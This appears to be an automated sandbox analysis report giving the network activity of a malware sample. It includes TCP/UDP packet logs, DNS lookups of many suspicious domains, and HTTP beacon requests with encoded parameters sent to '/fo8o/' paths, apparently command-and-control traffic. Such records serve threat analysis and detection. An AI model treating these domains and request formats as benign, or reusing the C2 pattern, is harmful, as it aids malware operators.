                                                                              Nov 21, 2024 12:55:43.312706947 CET4998380192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:43.433368921 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.433487892 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.433598042 CET4998380192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:43.437576056 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.513907909 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.513946056 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.514089108 CET4998380192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:43.518105030 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.518198967 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.518584967 CET4998380192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:43.526566982 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.526592016 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.526747942 CET4998380192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:43.535063028 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.535161018 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.535339117 CET4998380192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:43.543471098 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:43.545420885 CET4998380192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:43.547861099 CET4998380192.168.2.491.195.240.94
                                                                              Nov 21, 2024 12:55:43.673122883 CET804998391.195.240.94192.168.2.4
                                                                              Nov 21, 2024 12:55:57.225104094 CET5001580192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:55:57.344620943 CET805001566.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:55:57.344718933 CET5001580192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:55:57.346892118 CET5001580192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:55:57.466387987 CET805001566.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:55:58.673803091 CET805001566.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:55:58.673887014 CET805001566.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:55:58.673950911 CET5001580192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:55:58.858911037 CET5001580192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:55:59.880698919 CET5001680192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:00.001380920 CET805001666.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:00.003345013 CET5001680192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:00.007350922 CET5001680192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:00.126848936 CET805001666.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:01.298811913 CET805001666.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:01.298865080 CET805001666.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:01.298919916 CET5001680192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:01.514900923 CET5001680192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:02.534255028 CET5001780192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:02.653744936 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:02.653835058 CET5001780192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:02.656513929 CET5001780192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:02.776141882 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:02.776159048 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:02.776177883 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:02.776187897 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:02.776285887 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:02.776294947 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:02.776365995 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:02.776376009 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:02.776422977 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:04.057415962 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:04.057724953 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:04.061753035 CET5001780192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:04.171211004 CET5001780192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:05.190121889 CET5001880192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:05.309693098 CET805001866.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:05.309767962 CET5001880192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:05.312531948 CET5001880192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:05.432277918 CET805001866.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:06.621342897 CET805001866.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:06.621460915 CET805001866.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:06.621579885 CET5001880192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:06.625382900 CET5001880192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:06.744738102 CET805001866.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:11.973807096 CET5001980192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:12.100615978 CET8050019195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:12.100739956 CET5001980192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:12.102693081 CET5001980192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:12.225212097 CET8050019195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:13.514568090 CET8050019195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:13.514950991 CET8050019195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:13.515067101 CET5001980192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:13.611239910 CET5001980192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:14.627895117 CET5002080192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:14.748511076 CET8050020195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:14.748590946 CET5002080192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:14.750911951 CET5002080192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:14.876847029 CET8050020195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:16.110126972 CET8050020195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:16.110294104 CET8050020195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:16.110560894 CET5002080192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:16.265285015 CET5002080192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:17.285438061 CET5002180192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:17.405437946 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:17.405527115 CET5002180192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:17.412246943 CET5002180192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:17.531936884 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:17.531949997 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:17.532079935 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:17.532089949 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:17.532165051 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:17.532188892 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:17.532284975 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:17.532294035 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:17.532303095 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:18.871484041 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:18.871665001 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:18.871711969 CET5002180192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:18.977075100 CET5002180192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:19.986546993 CET5002280192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:20.106112957 CET8050022195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:20.107228994 CET5002280192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:20.111155987 CET5002280192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:20.231242895 CET8050022195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:21.508615971 CET8050022195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:21.509147882 CET8050022195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:21.509284019 CET5002280192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:21.521083117 CET5002280192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:21.640574932 CET8050022195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:43.454401970 CET5002380192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:43.575377941 CET8050023217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:43.575445890 CET5002380192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:43.579153061 CET5002380192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:43.698653936 CET8050023217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:44.789330006 CET8050023217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:44.789491892 CET8050023217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:44.789531946 CET5002380192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:45.093661070 CET5002380192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:46.121397972 CET5002480192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:46.241230965 CET8050024217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:46.241511106 CET5002480192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:46.245217085 CET5002480192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:46.364840031 CET8050024217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:47.450048923 CET8050024217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:47.450176954 CET8050024217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:47.450225115 CET5002480192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:47.749428034 CET5002480192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:48.770788908 CET5002580192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:48.893259048 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:48.893346071 CET5002580192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:48.896096945 CET5002580192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:49.016052008 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:49.016072989 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:49.016125917 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:49.016205072 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:49.016314983 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:49.016324997 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:49.016418934 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:49.016510963 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:49.016520023 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:50.143673897 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:50.143776894 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:50.147365093 CET5002580192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:50.405630112 CET5002580192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:51.424727917 CET5002680192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:51.544450045 CET8050026217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:51.544528961 CET5002680192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:51.546552896 CET5002680192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:51.666095972 CET8050026217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:52.794786930 CET8050026217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:52.795490026 CET8050026217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:52.795541048 CET5002680192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:52.799290895 CET5002680192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:52.918823957 CET8050026217.196.55.202192.168.2.4

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Nov 21, 2024 12:53:28.591357946 CET5053153192.168.2.41.1.1.1
                                                                              Nov 21, 2024 12:53:29.577212095 CET5053153192.168.2.41.1.1.1
                                                                              Nov 21, 2024 12:53:30.204037905 CET53505311.1.1.1192.168.2.4
                                                                              Nov 21, 2024 12:53:30.204058886 CET53505311.1.1.1192.168.2.4
                                                                              Nov 21, 2024 12:53:46.970890999 CET5200653192.168.2.41.1.1.1
                                                                              Nov 21, 2024 12:53:47.214026928 CET53520061.1.1.1192.168.2.4
                                                                              Nov 21, 2024 12:53:55.284862041 CET5896553192.168.2.41.1.1.1
                                                                              Nov 21, 2024 12:53:55.897166014 CET53589651.1.1.1192.168.2.4
                                                                              Nov 21, 2024 12:54:10.503308058 CET6388153192.168.2.41.1.1.1
                                                                              Nov 21, 2024 12:54:10.731642008 CET53638811.1.1.1192.168.2.4
                                                                              Nov 21, 2024 12:54:18.785253048 CET6146653192.168.2.41.1.1.1
                                                                              Nov 21, 2024 12:54:19.113535881 CET53614661.1.1.1192.168.2.4
                                                                              Nov 21, 2024 12:55:33.566903114 CET5960153192.168.2.41.1.1.1
                                                                              Nov 21, 2024 12:55:33.799339056 CET53596011.1.1.1192.168.2.4
                                                                              Nov 21, 2024 12:55:48.568994045 CET5700053192.168.2.41.1.1.1
                                                                              Nov 21, 2024 12:55:48.804826975 CET53570001.1.1.1192.168.2.4
                                                                              Nov 21, 2024 12:55:56.972629070 CET5593453192.168.2.41.1.1.1
                                                                              Nov 21, 2024 12:55:57.222434044 CET53559341.1.1.1192.168.2.4
                                                                              Nov 21, 2024 12:56:11.643075943 CET5660953192.168.2.41.1.1.1
                                                                              Nov 21, 2024 12:56:11.971231937 CET53566091.1.1.1192.168.2.4
                                                                              Nov 21, 2024 12:56:26.535161018 CET5592753192.168.2.41.1.1.1
                                                                              Nov 21, 2024 12:56:26.785492897 CET53559271.1.1.1192.168.2.4
                                                                              Nov 21, 2024 12:56:34.847003937 CET6221253192.168.2.41.1.1.1
                                                                              Nov 21, 2024 12:56:35.084980965 CET53622121.1.1.1192.168.2.4
                                                                              Nov 21, 2024 12:56:43.160325050 CET5136253192.168.2.41.1.1.1
                                                                              Nov 21, 2024 12:56:43.448860884 CET53513621.1.1.1192.168.2.4
                                                                              Nov 21, 2024 12:56:57.819225073 CET5522953192.168.2.41.1.1.1
                                                                              Nov 21, 2024 12:56:58.076641083 CET53552291.1.1.1192.168.2.4
                                                                              Nov 21, 2024 12:57:06.643129110 CET6439053192.168.2.41.1.1.1
                                                                              Nov 21, 2024 12:57:06.887583971 CET53643901.1.1.1192.168.2.4
                                                                              Nov 21, 2024 12:57:14.941781998 CET5829053192.168.2.41.1.1.1
                                                                              Nov 21, 2024 12:57:15.176017046 CET53582901.1.1.1192.168.2.4

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Nov 21, 2024 12:53:28.591357946 CET192.168.2.41.1.1.10xe1d5Standard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:53:29.577212095 CET192.168.2.41.1.1.10xe1d5Standard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:53:46.970890999 CET192.168.2.41.1.1.10x3064Standard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:53:55.284862041 CET192.168.2.41.1.1.10xa00fStandard query (0)www.goldenjade-travel.comA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:54:10.503308058 CET192.168.2.41.1.1.10xc423Standard query (0)www.antonio-vivaldi.mobiA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:54:18.785253048 CET192.168.2.41.1.1.10xdb82Standard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:55:33.566903114 CET192.168.2.41.1.1.10x3006Standard query (0)www.rssnewscast.comA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:55:48.568994045 CET192.168.2.41.1.1.10x22caStandard query (0)www.liangyuen528.comA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:55:56.972629070 CET192.168.2.41.1.1.10xfffaStandard query (0)www.techchains.infoA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:56:11.643075943 CET192.168.2.41.1.1.10x51abStandard query (0)www.elettrosistemista.zipA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:56:26.535161018 CET192.168.2.41.1.1.10x7c07Standard query (0)www.donnavariedades.comA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:56:34.847003937 CET192.168.2.41.1.1.10x280fStandard query (0)www.660danm.topA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:56:43.160325050 CET192.168.2.41.1.1.10x248aStandard query (0)www.empowermedeco.comA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:56:57.819225073 CET192.168.2.41.1.1.10xfd21Standard query (0)www.joyesi.xyzA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:57:06.643129110 CET192.168.2.41.1.1.10xbe75Standard query (0)www.k9vyp11no3.cfdA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:57:14.941781998 CET192.168.2.41.1.1.10x54faStandard query (0)www.shenzhoucui.comA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Nov 21, 2024 12:53:30.204037905 CET1.1.1.1192.168.2.40xe1d5No error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:53:30.204058886 CET1.1.1.1192.168.2.40xe1d5No error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:53:47.214026928 CET1.1.1.1192.168.2.40x3064Name error (3)www.kasegitai.tokyononenoneA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:53:55.897166014 CET1.1.1.1192.168.2.40xa00fNo error (0)www.goldenjade-travel.com116.50.37.244A (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:54:10.731642008 CET1.1.1.1192.168.2.40xc423Name error (3)www.antonio-vivaldi.mobinonenoneA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:54:19.113535881 CET1.1.1.1192.168.2.40xdb82No error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 21, 2024 12:54:19.113535881 CET1.1.1.1192.168.2.40xdb82No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 21, 2024 12:54:19.113535881 CET1.1.1.1192.168.2.40xdb82No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:55:33.799339056 CET1.1.1.1192.168.2.40x3006No error (0)www.rssnewscast.com91.195.240.94A (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:55:48.804826975 CET1.1.1.1192.168.2.40x22caName error (3)www.liangyuen528.comnonenoneA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:55:57.222434044 CET1.1.1.1192.168.2.40xfffaNo error (0)www.techchains.info66.29.149.46A (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:56:11.971231937 CET1.1.1.1192.168.2.40x51abNo error (0)www.elettrosistemista.zipelettrosistemista.zipCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 21, 2024 12:56:11.971231937 CET1.1.1.1192.168.2.40x51abNo error (0)elettrosistemista.zip195.110.124.133A (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:56:26.785492897 CET1.1.1.1192.168.2.40x7c07Name error (3)www.donnavariedades.comnonenoneA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:56:35.084980965 CET1.1.1.1192.168.2.40x280fName error (3)www.660danm.topnonenoneA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:56:43.448860884 CET1.1.1.1192.168.2.40x248aNo error (0)www.empowermedeco.comempowermedeco.comCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 21, 2024 12:56:43.448860884 CET1.1.1.1192.168.2.40x248aNo error (0)empowermedeco.com217.196.55.202A (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:56:58.076641083 CET1.1.1.1192.168.2.40xfd21Name error (3)www.joyesi.xyznonenoneA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:57:06.887583971 CET1.1.1.1192.168.2.40xbe75Name error (3)www.k9vyp11no3.cfdnonenoneA (IP address)IN (0x0001)false
                                                                              Nov 21, 2024 12:57:15.176017046 CET1.1.1.1192.168.2.40x54faName error (3)www.shenzhoucui.comnonenoneA (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • www.3xfootball.com
                                                                              • www.goldenjade-travel.com
                                                                              • www.magmadokum.com
                                                                              • www.rssnewscast.com
                                                                              • www.techchains.info
                                                                              • www.elettrosistemista.zip
                                                                              • www.empowermedeco.com

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449736154.215.72.110803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:53:30.340529919 CET507OUTGET /fo8o/?0xilO=7vZpwBG&SHqP-p=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c= HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Host: www.3xfootball.com
                                                                              Connection: close
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Nov 21, 2024 12:53:31.927459955 CET691INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Thu, 21 Nov 2024 11:53:31 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.449738116.50.37.244803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:53:56.022408962 CET798OUTPOST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.goldenjade-travel.com
                                                                              Origin: http://www.goldenjade-travel.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 203
                                                                              Referer: http://www.goldenjade-travel.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 64 4c 4e 69 4b 4e 35 6c 6e 6e 59 57 6a 72 30 50 55 51 69 66 77 72 76 4a 78 5a 5a 4d 4e 6d 50 57 67 3d 3d
                                                                              Data Ascii: SHqP-p=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOdLNiKN5lnnYWjr0PUQifwrvJxZZMNmPWg==
                                                                              Nov 21, 2024 12:53:57.640067101 CET492INHTTP/1.1 404 Not Found
                                                                              Content-Type: text/html; charset=us-ascii
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Thu, 21 Nov 2024 11:53:56 GMT
                                                                              Connection: close
                                                                              Content-Length: 315
